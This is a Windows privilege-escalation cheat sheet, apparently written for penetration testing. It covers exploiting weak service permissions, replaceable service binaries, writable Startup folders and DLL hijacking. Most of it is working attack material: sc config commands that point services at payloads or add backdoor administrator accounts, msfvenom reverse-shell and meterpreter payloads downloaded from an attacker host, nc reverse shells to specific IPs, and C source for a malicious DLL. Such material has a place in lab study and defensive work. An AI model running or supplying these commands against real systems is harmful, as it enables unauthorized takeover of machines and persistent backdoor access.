Incorrect permissions in services

1. Looking for weak permisions in services

- First we need to locate modifiable services and/or service binaries:

sc query

Get-Service | fl

wmic service list brief

powershell Get-Acl -Path "C:\Program Files\Vulnerable Services\Service 3.exe" | fl

Then to get clear results:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt

for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

Then we copy the content in a .txt and grep by the info we want.

If wmic is not available we can use sc.exe:

sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt

FOR /F %i in (Servicenames.txt) DO echo %i

type Servicenames.txt

FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt

FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

To locate modifiable services with Metasploit exploit : exploit/windows/local/service_permissions

To locate modifiable services with SharpUp:

SharpUp.exe audit ModifiableServices

- Then we need to check file permissions:

Manually:

icacls (Windows Vista +)

cacls (Windows XP)

With Get-ServiceAcl.ps1 (https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/):

import C:\Tools\Get-ServiceAcl.ps1

Get-ServiceAcl -Name VulnService2 | select -expand Access

2. Exploit

- Weak Service Permissions

We are looking for the following service permissions: ServiceRights: ChangeConfig, Start, Stop

First we need to validate the current path:

run sc qc VulnService2

Next, upload a service binary payload and reconfigure the binary path on the vulnerable service:

mkdir C:\Temp

cd C:\Temp

upload C:\Payloads\tcp-local_x64.svc.exe

run sc config VulnService2 binPath= C:\Temp\tcp-local_x64.svc.exe (The space after binPath= is intentional as this is how it's documented in sc's help documentation.)

*Alternatively we can add the current user as admin or create a new one:

sc config VulnService2 binPath= "cmd.exe /c net localgroup administrators {Domain}\{user} /add" start= "demand" obj= "NT AUTHORITY\SYSTEM" password= ""

or

sc config VulnService2 obj= "NT AUTHORITY\SYSTEM" password= ""

sc config VulnService2 binPath= "cmd.exe /c net user hacker Password123! /add && net localgroup Administrators hacker /add"

Next, Validate that the path has indeed been updated:

run sc qc VulnService2

Then, if the service is currently running, we must stop and then start the service to execute our malicious binary:

run sc stop VulnService2

run sc start VulnService2

Then, to restore the previous binary path (The additional set of escaped quotes is necessary to ensure that the path remains fully quoted, otherwise you could introduce a new unquoted service path vulnerability):

run sc config VulnService2 binPath= \""C:\Program Files\Vulnerable Services\Service 2.exe"\"

- Weak Service Binary Permissions

We are looking for the following service binary permissions: BUILTIN\Users:(F) or (F) or (C) perms for our user. This mean that we have writing permisions over that resources and we can inject a malicious binary.

First make a copy of the service binary we have modify privileges:

download Service 3.exe

Then we make a copy of the payload whilst renaming it to the name of the legitimate binary:

copy "tcp-local_x64.svc.exe" "Service 3.exe"

Then attempt to upload it.

upload C:\Payloads\Service 3.exe

If this displays an error because the service is running:

run sc stop VulnService3

upload C:\Payloads\Service 3.exe

ls

run sc start VulnServices

3. Examples

An example of C code for a getsuid:

#include <stdlib.h>
int main ()
{
int i;
    i = system("net localgroup administrators theusername /add");
return 0;
}

Then we can compile it with the following commnad:

i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe

Example of detection and explotation of weak service permission:

1. Detection

# Find all services authenticated users have modify access onto accesschk.exe /accepteula -uwcqv "Authenticated Users" *

if SERVICE_ALL_ACCESS then vulnerable

# Find all weak folder permissions per drive. accesschk.exe /accepteula -uwdqs Users c:\ accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\

# Find all weak file permissions per drive. accesschk.exe /accepteula -uwqs Users c:\*.* accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*

or

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"

[*] Checking service permissions...

ServiceName : daclsvc Path : "C:\Program Files\DACL Service\daclservice.exe" StartName : LocalSystem AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc' CanRestart : True

or

winPEAS.exe

[+] Interesting Services -non Microsoft-(T1007)

daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped YOU CAN MODIFY THIS SERVICE: WriteData/CreateFiles

[+] Modifiable Services(T1007) LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s: daclsvc: WriteData/CreateFiles

1. Explotation

# Attacker sudo python -m SimpleHTTPServer 80 sudo nc -lvp <PORT>

# Victim powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe')

sc config <SERVICENAME> binpath= "<PATH>\nc.exe <IP> <PORT> -e cmd.exe"

icacls {evil.exe or nc.exe} /grant Everyone:F

sc start <SERVICENAME> or net start <SERVICENAME>

Example of detection and explotation of weak service executable permission:

1. Detection

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"

[*] Checking service executable and argument permissions...

ServiceName : filepermsvc Path : "C:\Program Files\File Permissions Service\filepermservice.exe" ModifiableFile : C:\Program Files\File Permissions Service\filepermservice.exe ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...} ModifiableFileIdentityReference : Everyone StartName : LocalSystem AbuseFunction : Install-ServiceBinary -Name 'filepermsvc' CanRestart : True

or

winPEAS.exe

[+] Interesting Services -non Microsoft-(T1007)

filepermsvc(Apache Software Foundation - File Permissions Service)["C:\Program Files\File Permissions Service\filepermservice.exe"] - Manual - Stopped File Permissions: Everyone [AllAccess]

1. Exploitation

# Attacker msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe sudo python -m SimpleHTTPServer 80 sudo nc -lvp <PORT>

# Victim powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.exe', 'C:\Temp\program.exe')

copy /y c:\Temp\program.exe "C:\Program Files\File Permissions Service\filepermservice.exe"

icacls {evil.exe or nc.exe} /grant Everyone:F

sc start filepermsvc

Example of detection and explotation of StartUp applications:

1. Detection

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

C:\>icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup BUILTIN\Users:(F) TCM-PC\TCM:(I)(OI)(CI)(DE,DC) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(F) BUILTIN\Users:(I)(OI)(CI)(RX) Everyone:(I)(OI)(CI)(RX)

If the user you're connecte with has full access ‘(F)’ to the directory (here Users) then it's vulnerable.

1. Exploitation

# Attacker msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe sudo python -m SimpleHTTPServer 80 sudo nc -lvp <PORT>

# Victim cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.exe', '.\program.exe')

To execute it with elevated privileges we need to wait for someone in the Admin group to login.

Examples with specific CVE's:

• Example with Windows 10 - CVE-2019-1322 UsoSvc

Prerequisite: Service account

PS C:\Windows\system32> sc.exe stop UsoSvc PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"

PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"

PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

PS C:\Windows\system32> sc.exe qc usosvc [SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usosvc TYPE : 20WIN32_SHARE_PROCESS START_TYPE : 2AUTO_START (DELAYED) ERROR_CONTROL : 1NORMAL BINARY_PATH_NAME : C:\Users\mssql-svc\Desktop\nc.exe10.10.10.104444-e cmd.exeLOAD_ORDER_GROUP : TAG : 0DISPLAY_NAME : Update Orchestrator Service DEPENDENCIES : rpcss SERVICE_START_NAME : LocalSystem

PS C:\Windows\system32> sc.exe start UsoSvc

• Example with Windows XP SP1 - upnphost

#NOTE: spaces are mandatory for this exploit to work !

sc config upnphost binpath="C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"

sc config upnphost obj=".\LocalSystem"password=""

sc qc upnphost sc config upnphost depend=""

net start upnphost

If it fails because of a missing dependency, try the following commands.

sc config SSDPSRV start=auto net start SSDPSRV net stop upnphost net start upnphost

sc config upnphost depend=""

Using accesschk from Sysinternals or accesschk-XP.exe - github.com/phackt

accesschk.exe-uwcqv "Authenticated Users"*/accepteula RW SSDPSRV SERVICE_ALL_ACCESS RW upnphost SERVICE_ALL_ACCESS

accesschk.exe-ucqv upnphost upnphost RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW BUILTIN\Administrators SERVICE_ALL_ACCESS RW NT AUTHORITY\Authenticated Users SERVICE_ALL_ACCESS RW BUILTIN\Power Users SERVICE_ALL_ACCESS

sc config <vuln-service>binpath="net user backdoor backdoor123 /add"

sc config <vuln-service>binpath="C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"

sc stop <vuln-service>

sc start <vuln-service>

sc config <vuln-service>binpath="net localgroup Administrators backdoor /add"

sc stop <vuln-service>

sc start <vuln-service>

3. DLL Hijacking

Find missing DLL:

-Find-PathDLLHijack PowerUp.ps1 -ProcessMonitor : check for"Name Not Found"

Compile a malicious dll:

Forx64 compile with --> "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll"

Forx86 compile with --> "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll"

Content of windows_dll.c:

BOOL WINAPI DllMain (HANDLE hDll,DWORD dwReason,LPVOID lpReserved) {
    if(dwReason ==DLL_PROCESS_ATTACH) {
        system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
        ExitProcess(0);
    }
    returnTRUE;
}

Or we can use msfvenom to create the malicious .dll:

msfvenom -p windows/meterpreter/reverse_https LHOST=172.16.48.10 LPORT=4444 -f dll > {name of the .dll}

Then donwload the dll on the original dll directorie, example:

powershell -c iex (New-Object Net.WebClient).DownloadFile('http://172.16.48.10/UxTheme.dll', 'C:\Program Files (x86)\Agnitum\Outpost Firewall 1.0\UxTheme.dll')

Then: shutdown /r /t 0

We need to shut down the windows machine to be able to run the .dll, file don't forget to start your multi handler beforehand.

It may take a few minutes for the machines to come back online and the exploit to work.